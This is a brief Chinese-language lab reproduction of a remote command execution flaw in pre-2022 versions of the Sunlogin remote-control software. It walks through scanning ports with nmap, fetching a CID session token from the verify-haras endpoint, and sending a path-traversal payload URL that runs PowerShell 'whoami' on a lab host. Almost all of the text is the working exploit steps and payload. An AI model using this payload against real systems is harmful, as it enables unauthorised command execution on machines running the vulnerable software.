一、环境

1.1 网上下载低版本的向日葵<2022

二、开始复现

2.1 在目标主机上打开旧版向日葵

2.2 首先打开nmap扫描向日葵主机端口

2.3 在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras （端口号：每一个都尝试，直到获取到session值CID）

cgi-bin/rpc?action=verify-haras

2.4 Cookies添加拿到的CID后加上payload请求

http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami

执行一下命令